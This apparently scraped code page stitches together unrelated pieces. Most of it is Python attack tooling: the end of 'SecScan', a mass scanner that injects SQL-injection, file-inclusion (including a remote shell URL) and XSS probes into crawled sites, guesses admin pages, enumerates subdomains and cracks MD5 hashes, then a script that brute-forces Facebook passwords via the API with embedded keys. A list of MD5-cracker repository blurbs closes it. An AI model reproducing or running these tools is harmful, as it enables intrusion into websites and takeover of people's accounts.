elif (re.findall('java.sql.sqlexception', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('query failed:', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('postgresql.util.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Error:unknown', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_numrows', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_num', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Invalid Query', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('FetchRow', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Syntax error', data, re.I)): self.mssql(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + W+url else: print O+"MySql: " + url + W write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print G+'Dupe: ' + url + W else: print O+"MsSql: " + url + W write = open (self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Lfi: " + url + W write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """<ScRIpT>alert('xssBYm0le');</ScRiPt>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("xssBYm0le", data, re.I)): self.xss(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Xss: " + url + W write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): self.rfi(link) vuln += 1 else: print B+link + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Rfi: " + url + W write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print O+'Found: ' + G+site + W class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found' + W print '>> ' + str(invuln) + G+' Sites Not Vulnerable' + W print '>> ' + str(np) + R+' Sites Without Parameters' + W if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; def main(): """Outputs Menu and gets input""" quotes = [ '\nm0le@tormail.org\n' ] print (O+''' ------------- -- SecScan -- --- v1.5 ---- ---- by ----- --- m0le ---- -------------''') print (G+''' -[1]- SQLi -[2]- LFI -[3]- XSS -[4]- RFI -[5]- Proxy -[6]- Admin Page Finder -[7]- Sub Domain Scan -[8]- Dictionary MD5 cracker -[9]- Online MD5 cracker -[10]- Check your IP address''') print (B+''' -[!]- If freeze while running or want to quit, just Ctrl C, it will automatically terminate the job. ''') print W global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print choice(quotes) elif option == '2': Crawl() output() print choice(quotes) elif option == '3': Crawl() output() print choice(quotes) elif option == '4': Crawl() output() print choice(quotes) elif option == '5': Ip() print choice(quotes) elif option == '6': admin() aprint() print choice(quotes) elif option == '7': subd() print choice(quotes) elif option == '8': word() print choice(quotes) elif option == '9': OnlineCrack().crack() print choice(quotes) elif option == '10': Check().grab() print choice(quotes) else: print R+'\nInvalid Choice\n' + W time.sleep(0.9) main() else: print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W time.sleep(0.9) main() if __name__ == '__main__': main()
RdH4CK3r / Fb Crackerute.py - Facebook Brute Force # -*- coding: utf-8 -*- ## import os import sys import urllib import hashlib API_SECRET = "62f8ce9f74b12f84c123cc23437a4a32" __banner__ = """ +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ |#Author: DedSecTL <dtlily> | |#Contact: Telegram @dtlily | |#Date: Fri Feb 8 10:15:49 2019 | |#This tool is made for pentesting. | |#Changing the description of this tool | |Won't made you the coder !!! | |#Respect Coderz | |#I take no responsibilities for the | | use of this program ! | +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ """ print("[+] Facebook Brute Force\n") userid = raw_input("[*] Enter [Email|Phone|Username|ID]: ") try: passlist = raw_input("[*] Set PATH to passlist: ") if os.path.exists(passlist) != False: print(__banner__) print(" [+] Account to crack : {}".format(userid)) print(" [+] Loaded : {}".format(len(open(passlist,"r").read().split("\n")))) print(" [+] Cracking, please wait ...") for passwd in open(passlist,'r').readlines(): sys.stdout.write(u"\u001b[1000D[*] Trying {}".format(passwd.strip())) sys.stdout.flush() sig = "api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail={}format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword={}return_ssl_resources=0v=1.0{}".format(userid,passwd.strip(),API_SECRET) xx = hashlib.md5(sig).hexdigest() data = "api_key=882a8490361da98702bf97a021ddc14d&credentials_type=password&email={}&format=JSON&generate_machine_id=1&generate_session_cookies=1&locale=en_US&method=auth.login&password={}&return_ssl_resources=0&v=1.0&sig={}".format(userid,passwd.strip(),xx) response = urllib.urlopen("https://api.facebook.com/restserver.php?{}".format(data)).read() if "error" in response: pass else: print("\n\n[+] Password found .. !!") print("\n[+] Password : {}".format(passwd.strip())) break print("\n\n[!] Done .. !!") else: print("fbbrute: error: No such file or directory") except KeyboardInterrupt:
SagarBiswas-MultiHAT / HashAttackDemosHashAttackDemos — An educational Python toolkit demonstrating secure password hashing (Argon2id, bcrypt, scrypt) and common failure modes (MD5, rainbow tables). Includes reusable library hash_password_cracker, attack demos (dictionary/rainbow/hybrid), CLI tools, and unit tests — for defensive learning on data you own or are authorized to test.
CodeCrackerSND / BarsWF V2World Fastest MD5 cracker
PhilipMur / Password CrackerA simple C# md5 hash password cracker using wordlists , A Console application.
zhemao / Md5crackerA Hardware MD5 Cracker for the Cyclone V SoC
mfazrinizar / Anon MD5 HASH CrackerThis is a simple MD5 Hash Cracker tool to decrypt it. The usage is :
epixoip / Md5substrsubstr(md5()) cracker
sghctoma / OclcrackA simple OpenCL-based MD5 hash cracker